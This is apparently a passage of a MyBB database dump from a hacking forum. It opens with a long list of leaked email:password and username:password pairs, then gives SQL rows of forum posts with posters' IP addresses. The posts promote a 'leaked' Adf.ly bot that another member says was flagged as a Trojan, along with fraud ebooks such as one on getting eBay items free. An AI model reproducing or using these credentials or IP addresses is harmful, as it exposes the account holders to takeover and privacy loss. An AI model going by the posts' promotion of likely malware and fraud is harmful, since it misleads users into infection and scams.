christopher0065@hotmail.com:7852406 rens18@hotmail.com:poep23 traevannman@hotmail.com:wweraw conner.catlow@live.com:conner1 j.wharton@hotmail.com:gibbons1 brandon.robinson1494@yahoo.com:naganomaru walkwithswag1@hotmail.com:123qweasd ininja65@yahoo.com:ninjas stewart@live.co.uk:979780 caneble@hotmail.com:poleman r.kryvenchuk@yahoo.com:12345t speedy_2148@yahoo.com:hockey1 damian.126@live.com:nofear tylerstill39@yahoo.com:bamafan1 sil3ntturtl3@yahoo.com:fishyboy mdgonyon@yahoo.com:123four tylerzorich@yahoo.com:boomer1 aBuuuuuZe@live.co.uk:poppycat --------------------------------------------------------- somewhere1996@yahoo.com:fredfred sonicspeed25@hotmail.com:antonio ownage110001@hotmail.com:pooface parlorDDBB@aol.com:therock1 podfafa@yahoo.com:chidori ontherightside@hotmail.com:falcon aliraheel99@live.co.uk:capslock kris100@hotmail.no:kris12 aliraheel99@live.co.uk:capslock wale415@yahoo.com:dogdog khris.ranger@hotmail.com:charizard range30033@hotmail.co.uk:198912 z121qrcg@msn.com:colombia trucks_alex@hotmail.com:scania ontherightside@hotmail.com:falcon rock_dog100@hotmail.com:dalton hecklerryan@yahoo.com:heckler1 lumpjack@gmail.com:pizza5 taterjon69@yahoo.com:asshole12 sam-j-r74@hotmail.co.uk:scruffie v.kash12@gmail.com:master12 marshallfan94@Yahoo.com:baseball94 Giasson3@hotmail.com:killbill hellboy_23592@hotmail.com:nicolas1 menno_gjaltema@hotmail.com:destination wvogler11@aol.com:chase1 younglightning235@gmail.com:yondaime matt1027@comcast.net:sadie1 marc9999@comcast.net:hotdog123 thebug310@aol.com:alexander1 flyboy9991@hotmail.com:racecar tbrixius89@gmail.com:thumper1 mr.makka.pakka@hotmail.com:password123 rimssat22@yahoo.com:walter kiabadragon@aol.com:skater7 iggyggy@hotmail.com:iglesias zerohcontrol@gmail.com:westwood unhallowed@hot.ee:heroes mchz41@gmail.com:100295 felix@overbeck-hansen.dk:hansen lalakid3@yahoo.com:crappy bigben@warp.nfld.net:eyeliner briancapxd@hotmail.com:critical crazymothatrucker@ymail.com:killzone KevQSweet@yahoo.com:steelers bd123100@aol.com:shotgun marshalmelow@hotmail.com:losers adam.mcclements@googlemail.com:adam123 1234kidze16:tr1st1an Q Cry Q:when8606 Ownedamated:we3kings stynkyy:yello321 boodarocks:steelers Dcc4:dmccmd Jason123x:blazers Aotta:ThisIsMyPassword F2pker inc:jason1 Dar_Ko:a11009041a auraky1:ky135792 Li Gh T Side:chase123 k1lla_tick:lindros the jon8:dude676 3 second k0:spearow1 Sworddude03:de3vin Whorsy:15012266639 fredx105:fred101 1a9n9t2h:tetjuvefr7 Derivate You:fisherj1019 excalllibur:fielding1 vazire:manson Zealot Mania:241287 v achillies:pimpz4 Hustlin Fluf:taproot12 Ava Defil3d:awsome Darkness9820:akshay7912 geddon233:meowface Ddorda:302383510 Aerial Bacon:fishdude Expert 4im:7251994 travis8_8:ihave3cats flattman:harrah12 drakgon180:flare TheGeVirgin:HighFive fakewaterwalker:armageddon Zeas666:dahliastraat Solid Kirby:Denmarkis1337 Hierofalcon:jehuty Chuckeh:riona88 Epic Eric:xcap0x stikk6:kat57 sqrlwizard:nordman98 SteveGates11:k9killer Palad1n X1:troublem Tahnycakes:rtkgifts gji456:madison Ipk888:stopit12 xlxy:fr0sty The Joqer:coolusa21 Crunk Carl:dcpr1c3r Alchenoid:socky boozer_pk:boozer An_arc_e:langishm4rt fishhead190:kong69 Runeman X8:666abc Pure Charges:bergelis Lemons Merch:6897342 srankie1994:qweeasw1 Weed Mob:o1202573033 0bby mail:baadshah ----------------------------------------------------- nicky206@hotmail.com:southpark adde_star_94@hotmail.com:kawasaki c.arnison@btinternet.com:chrisa spyrochriz@yahoo.com:buffalo ldkay@eastlink.ca:dingdong only1redheadedangel@yahoo.com:precious alecvanderlinden@live.nl:laptop lordarmel@gmail.com:bowser john.smith.13333@gmail.com:chinas upo here=-086475222222222222222222222 jonnyboy1993@hotmail.com:hamilton boyjman@live.com.au:whitton whako10@yahoo.com:heydude gurbax25@hotmail.com:navjot flamin_james@hotmail.co.uk:chinky nathanmounlasy@yahoo.com:billion thetommy123@yahoo.com:mikaela tdk_shadowlail@yahoo.com:killgore tooth_pic@live.com:slamdunk garrett3650@yahoo.com:killop simonatkins1@blueyonder.co.uk:240593 twpix1@hotmail.com:badman asscorona@gmail.com:sweeney nagydomonkos@citromail.hu:domokos codyswhitworth@hotmail.com:dalek tony-u12bme@hotmail.co.uk:shithead joku-96@hotmail.com:aleksi runezacho@yahoo.dk:bertram spamfrodo@yahoo.com:billyboy wishxdagger@gmail.com:camille greeny_had_s3x@hotmail.com:empire byers.neil@hotmail.com:sausages theworstsite@hotmail.com:jonny pthypervxkenpachi@hotmail.com:10011998 rosiu_cool@yahoo.com:06281996 death_011@hotmail.com:router chickensx68@GMAIL.COM:skillz kol55655@hotmail.com:kolton kflipgsk8s@aol.com:121193 ra777500@yahoo.com:anderson sophiewantsyou@hotmail.co.uk:chahal benweekly@gmail.com:mankind joey.causey@yahoo.com:454545 daxslayer5@yahoo.com:red123 domicooke@hotmail.co.uk:huckle acidrocker_@hotmail.com:lolita cococlassic44@aol.com:masters drumgun@live.com.au:knights moniar7@hotmail.com:newguy kiddpaul808@gmail.com:sayson valencia.760@hotmail.com:ramon john011293@hotmail.co.uk:minime lilr0cker9@yahoo.com:billyk pkislife@gmail.com:warren cjohn046@yahoo.com:johnjohn snorrie@live.com:norrie skate-kyle@hotmail.com:awesome ultimatecos21@yahoo.com:21031990 foran7@bigpond.com:byebye rossythecoming@live.com:daisyo volcomskater1357@yahoo.com:hotshot balindabriggs@yahoo.com:nicolas2 bernwuzhere24@gmail.com:bernie erestrepo08@hotmail.com:clayton gusler94@gmail.com:alcatraz aapjekoen@hotmail.com:banjer blaydys@gmail.com:10081995 justintran21@hotmail.com:tocome Nathanflol@live.com:forgot ragzzy4life@gmail.com:strength korsan_freack@hotmail.com:merhaba blancoaziel@yahoo.com:luiggi fcknudde25@hotmail.com:farrari bd123100@aol.com:shotgun jarobertson91@yahoo.com:10201991 clement_ster@hotmail.com:16641664 ricardo_boynight@hotmail.com:110989 rowandeschaux@hotmail.com:frikandel donothaveanicecream@hotmail.com:samsam jake25denges@yahoo.com:pissoff cody_833@hotmail.com:02131997 jack_g_unit69@hotmail.com:25802580 ltct@hotmail.co.uk:tiger1 andrewcarswell97@yahoo.com:909909 BrianRoberts54321@Gmail.com:deerslayer masesalcido@yahoo.com:258456 jari_inthehuis@hotmail.com:boesen joe.grice@tiscali.co.uk:millie kingboy123drake@yahoo.com:william moocity1234@gmail.com:082195 kratos708@aol.com:mohammed blackxninja@rocketmail.com:cooler kifibra_igor@hotmail.com:250396 ------------------------------------...65@hotmail.com:zamorakdream ant1_am3r1can_T3ch_sn1p3r@hotmail.com:philips mr_moochoo123@hotmail.com:bluecheese chstrackrebel@aol.com:barrier joey_versluis@hotmail.com:kwamtuns twllol@hotmail.com:qunyu71 curtis_hewson@hotmail.com:469713 benziller@optonline.net:godziller fatalspin:kn15966901 5k richer:endlessonline steelerz 94:lacky whyurunbch:nejinted daniel525@hotmail.co.uk:dandan danielsyme@hotmail.com:windows chrisc303@yahoo.com:garbage calluml_24@live.com:twister paulvorobyev@gmail.com:winwin jlyankee@comcast.net:cat123 mrxechno@hotmail.com:hongkong moultondustin@hotmail.com:snoots thesaltonater@gmail.com:frankie imanoob4life2010@hotmail.com:almost stufonoob@aol.com:sunset ihatetheman2@yahoo.com:polos ralphie8r@yahoo.com:freebird devinincorp@yahoo.com:brock koltenakr@yahoo.com:kolten eay-its-me@hotmail.com:huisman omfglights0ff@aol.com:comet jacoterry@yahoo.com:050594 GREENLIZERD@HOTMAIL.COM:auriga Dbacksplaya008@aim.com:hooters s_x_cjake@hotmail.com:bigtits jam.on_toast@hotmail.com:lansing sabzeman@gmail.com:mehrdad nick_space_rocks@hotmail.com:bigred dylaniscool56@aim.com:tapes kazukixx@hotmail.com:spiker PipB316:robvandam hover509:nelysk Lalrian:starrain a_htje:ah1995 ammerson3:binkie1 ambbie:amber6 [/code][/spoiler]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e132172d5a05587e619f7f776759ae81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2053', '441', '0', '61', 'Adf.ly Bot + Adfoc.us Bot', '0', '82', 'iTzIpod', '1347712953', '[color=#FF0000][size=large]Hey guys, I\'m leaking another program![/size][/color] [color=#FF4500]This is a really simple to use! Check it out.[/color] Works with [b]Adf.ly[/b] links and [b]Adfoc.us[/b] links! [color=#FF4500][size=large][b]ScreenShots:[/b][/size][/color] [img]http://img706.imageshack.us/img706/480/adflybot.png[/img] [color=#FF1493][b]Proof :[/b][/color] [img]http://img69.imageshack.us/img69/4334/58c0cba72724492d8b90e18.png[/img] [url=https://www.virustotal.com/file/af40b97913f588202d60633d61a51cf1658858d146e147364008f521b7bd812c/analysis/]Virus Scan [Click Here][/url] [mod]Download Link Removed! -Staff[/mod] [b][color=#FF1493]Remember! If you enjoyed this please don\'t forget to post a thanks![/color][/b]', '24.212.197.164', '416597412', '1', '0', '1', '1347939100', '1', 'e2d6e187ba02880fe1705aebb7da5bec', '0', '1347939100'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2054', '442', '0', '42', 'Giant Solar Flare set to hit Earth in 2013', '0', '82', 'iTzIpod', '1347713327', 'A huge solar flare is expected to hit Earth in 2013, the peak of the 11 year solar flare cycle. Experts are saying this could be close to as big or bigger than the 1859 solar flare that knocked out all telegraph communications for months in some areas. [quote]They fear a huge solar flare is due to erupt in 2013 — causing blackouts and global chaos. The once-in-a-century disaster could see power grids crash, communication systems collapse, planes grounded, food supplies hit and the internet shut down. Everything from home freezers to car sat navs would be affected. The disaster could mirror the Great Solar Flare of 1859. Read more: http://www.thesun.co.uk/sol/homepage/news/3145874/Solar-flare-to-paralyse-Earth-in-2013.html#ixzz25q74kcz4 [/quote] Articles to check out if interested: http://www.thesun.co.uk/sol/homepage/news/3145874/Solar-flare-to-paralyse-Earth-in-2013.html http://www.space.com/12586-solar-storms-intensity-2013-peak-nasa.html [b][i]Are we really better off now than we were before technology?[/i][/b]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b99b97fbcc8101918add70ab3e068bb9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2055', '443', '0', '42', 'Apple Announces the iPhone 5', '0', '82', 'iTzIpod', '1347713405', '[i]A couple days ago at Apple\'s iPhone 5 Event the company finally lifted the lid on its new smartphone. The device is officially called the iPhone 5 (despite being the 6th iPhone from the Cupertino company). The device looks just like the previously leaked image, with a slightly taller screen. Apple is referring to the device as \"the most beautiful product we\'ve ever made.\" The iPhone 5 is made entirely of glass and aluminum and is the thinnest and lightest iPhone yet - it\'s 18% thinner and 20% lighter than the iPhone 4S. Apple is calling it \"The world\'s thinnest smartphone.\" [img]http://oyster.ignimgs.com/wordpress/stg.ign.com/2012/09/Screen-shot-2012-09-12-at-11.56.38-AM.png[/img] [color=#FF0000]Read the full article HERE:[/color] http://www.ign.com/articles/2012/09/12/apple-announces-iphone-5[/i]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e2f035ac142bf3d629c2b56803e38864', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2056', '444', '0', '61', '[eBook] How to get stuff on eBay for Free', '0', '82', 'iTzIpod', '1347713716', 'Hello. Today I\'m leaking an awesome eBook that will let you get anything on eBay for free! This method works 100% for any product worth any price! Here is the link: http://www.mediafire.com/view/?rz7xwsthpd01brg Enjoy! Please post a thanks! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6f6144760797c68c417bfa0fe7b339d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2057', '445', '0', '61', '[eBook] Adf.ly Money Making Machine', '0', '82', 'iTzIpod', '1347713946', 'Download link - http://www.mediafire.com/view/?&2ef3quo2tb8k5ye Password - .exe Enjoy! :D Don\'t forget to post a thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dc078a88f5f3facb9c2e2bcabddbe7ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2058', '446', '0', '28', 'This forum is dead..', '0', '82', 'iTzIpod', '1347716846', '-_- Why is it dead. Lets try to bring it back to life?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8c157233fdf27a2ee29c8e1ee244e231', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2059', '383', '1967', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '82', 'iTzIpod', '1347717208', '[quote=\'sirchamp\' pid=\'1967\' dateline=\'1347653342\'] Asking for rep is forbidden. LQ .. [/quote] @KENNERZ, point proven. :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'be13fc885a7acdda41806693266aa388', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2060', '436', '1998', '7', 'RE: Motivation', '0', '82', 'iTzIpod', '1347717297', '[quote=\'t3h jok3r\' pid=\'1998\' dateline=\'1347676779\'] I think it\'s because we getting known AND schools have started so people are getting off from holidays and now staying more at home. [/quote] Yeah. If only summer was 3 months, we could\'ve had our members active a little longer.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd96f32e91889b019f5356be447d81ecc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2061', '425', '1939', '61', 'RE: Huge SEing Giveaway [50+]', '0', '82', 'iTzIpod', '1347717416', 'Don\'t worry. It\'s safe...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '151a7599ad79e87496bf2cb5b5ef2ec1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2062', '427', '1941', '61', 'RE: Photoshop CS6 Extended 64 Bit', '0', '82', 'iTzIpod', '1347717463', 'No problem. This is for the people that want CS6 I guess.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a45cec25d71c550965aa3cc6a6a1379f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2063', '433', '2008', '61', 'RE: eBooks Giveaway', '0', '82', 'iTzIpod', '1347717539', '[quote=\'p420\' pid=\'2008\' dateline=\'1347677433\'] [quote=\'iTzIpod\' pid=\'1980\' dateline=\'1347664544\'] [quote=\'t3h jok3r\' pid=\'1977\' dateline=\'1347664320\'] Why not take a screenshot of some of them? [/quote] I don\'t own them. [/quote] I\'m sure Jok3r meant to take a screenshot of your giveaway folder. [/quote] I just said I don\'t own them? :o It\'s not my file. But it\'s safe. I can guarantee you that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f0cef59d3f44c52fc2278f235cc56978', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2064', '430', '1951', '9', 'RE: ? ?[7.99]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '82', 'iTzIpod', '1347717708', 'Do you want me to do a vouch copy? If so PM me. Other than that, Good luck with sales', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d849385f1147947a757c7fcfc71ba59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2065', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '82', 'iTzIpod', '1347717769', 'Added some programs and methods to the Upgrade Section. Good luck/Enjoy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '48692932ae2fbdb3846af193a9dafb79', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2066', '38', '2041', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347717832', '[quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\'] I have that Book. Kevin Mitnick The Art of Deception. [/quote] Oh ok. I\'ll see if I can read it online. And then I will try this at school :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e94ed68a4e27d27ff2a0819e0f5d9647', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2067', '345', '1983', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347717879', '[quote=\'NXK\' pid=\'1983\' dateline=\'1347665593\'] I don\'t know it\'s just the colors/ the font. I\'m not a fan of really dark things. [/quote] Still looking for that Font name..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '26ef513872fced9fb56c76ae2cdf91ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2068', '385', '2043', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347718144', '[quote=\'R?????zo?\' pid=\'2043\' dateline=\'1347703732\'] I don\'t want you to leave either, you are a really good member in my opinion, I\'ve read somewhere that you are busy with school but you should stick here, school comes first of course but even if your not active everyday , I\'m sure you can find time to leave a post or two sometime. And now that we just become friendly :P I don\'t want you to leave. Well it\'s your call anyways, but good luck to whatever your decision is :) [/quote] Aha thanks for those kind words <3 It literally almost made me tear up :/ I will try to be active on weekends. But I can\'t guarantee it because I get a lot of assignments and projects..', '24.212.197.164', '416597412', '1', '0', '82', '1347718187', '1', '320e96424def238f94355bbc8152bffe', '0', '1347718187'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2069', '422', '2042', '19', 'RE: [Read] Announcement', '0', '82', 'iTzIpod', '1347718216', '[quote=\'R?????zo?\' pid=\'2042\' dateline=\'1347702452\'] Thanks for doing this giveaways, it should be one of the rules of this group to NOT share anywhere else outside the group. [/quote] Added to the thread. Thanks for the suggestion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ea66cb5dd64d3ce6072a4b66c14377b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2070', '447', '0', '7', '2000 Posts', '0', '82', 'iTzIpod', '1347718314', 'Congratulations L33t Hacking on 2000+ Posts. This is a wonderful forum achievement! Thank you everyone that has contributed to LH. And everyone that has posted. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99ad337eeae09d94adaa7bac3971a722', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2071', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '53', 'sirchamp', '1347718426', '[quote]5. You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"reputation is appreciated\". [/quote] Read the rules Please', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '9f7a0159e98c3c17314bda636a573b2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2091', '437', '2090', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347741361', '[quote=\'t3h jok3r\' pid=\'2090\' dateline=\'1347737042\'] [quote=\'iTzIpod\' pid=\'2046\' dateline=\'1347711336\'] [quote=\'t3h jok3r\' pid=\'2035\' dateline=\'1347683967\'] [quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\'] [quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\'] Website Viewer? And fixed the link to L33THacking.net [/quote] As long as it\'s an adf.ly link and someone clicks on it, you still get money. :p [/quote] I have no idea what you are talking about. [/quote] I meant. l33thacking.net was still an Adf.ly link. And so if someone clicks on it, you can still get money. O_o But you changed it to L33thacking.net now so it doesn\'t matter. [/quote] Oh OK, it\'s better to have it redirect to the new LH site because then we can even get more members. [/quote] Do you know an estimate on when that\'s gonna happen?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'af53a2f91cf7ed0c0e1c56ccc8630905', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2076', '345', '2075', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347721186', '[quote=\'R?????zo?\' pid=\'2075\' dateline=\'1347720890\'] My attemps: [URL=http://imgur.com/Mul6K][IMG]http://i.imgur.com/Mul6K.png[/IMG][/URL] [URL=http://imgur.com/fmK09][IMG]http://i.imgur.com/fmK09.png[/IMG][/URL] [URL=http://imgur.com/ZX8Ku][IMG]http://i.imgur.com/ZX8Ku.png[/IMG][/URL] [URL=http://imgur.com/xyMsA][IMG]http://i.imgur.com/xyMsA.png[/IMG][/URL] [URL=http://imgur.com/uDY9P][IMG]http://i.imgur.com/uDY9P.png[/IMG][/URL] [/quote] If you try using the font NXK used, it would all look great.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e7cb2ca5e75728f873c66e531fbf69b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2077', '345', '2039', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347724859', 'http://www.dafont.com/8bit-wonder.font That\'s the font.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1033982987d5cd92a20440b2d8035369', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2078', '56', '140', '15', 'RE: Tubeonia [ Best Youtube Bot ]', '0', '100', '??zg???g????61', '1347725374', '<3 this is awesome thanks bro [hr] Er, could you post a direct download?', '65.96.215.138', '1096865674', '1', '0', '100', '1347725433', '1', 'c444efdf9237683b16f6ac6323646f45', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2079', '92', '220', '15', 'RE: [FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '100', '??zg???g????61', '1347725601', 'Awesome downloading now. Thanks [hr] Doesn\'t work </3 thanks anyway.', '65.96.215.138', '1096865674', '1', '0', '100', '1347725959', '1', '940700162cc0948eb6589fe6b3e22654', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2112', '441', '2053', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '1', 't3h jok3r', '1347756651', 'Trojan? Can you explain why the virus results detected a Trojan?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cbe52a2ef332eb78cb3758138efb5b35', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2081', '345', '2077', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347729354', '[quote=\'NXK\' pid=\'2077\' dateline=\'1347724859\'] http://www.dafont.com/8bit-wonder.font That\'s the font. [/quote] Thanks very much. I will make a userbar on once I am free.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '23da77b114d88676df877ffff95cbb43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2082', '385', '1768', '19', 'RE: Discussion', '0', '100', '??zg???g????61', '1347735593', 'DONT LEAVE BRAH DONT DO IT', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'baef1746071fdc16bcb9780850c22289', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2083', '448', '2073', '61', 'RE: Broken Links', '0', '1', 't3h jok3r', '1347736285', 'I have a quick question, why is this closed?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '45d3e10bb8b5a26af4478abe75992126', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2084', '447', '2070', '7', 'RE: 2000 Posts', '0', '1', 't3h jok3r', '1347736421', 'Yippeeeeee. Thanks a lot everyone. I highly appreciate it, the day we get 500 threads I will give out something for free to the whole community.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '191cb40709b0851e954198152f669c20', '0', '0'); INSERT INTO 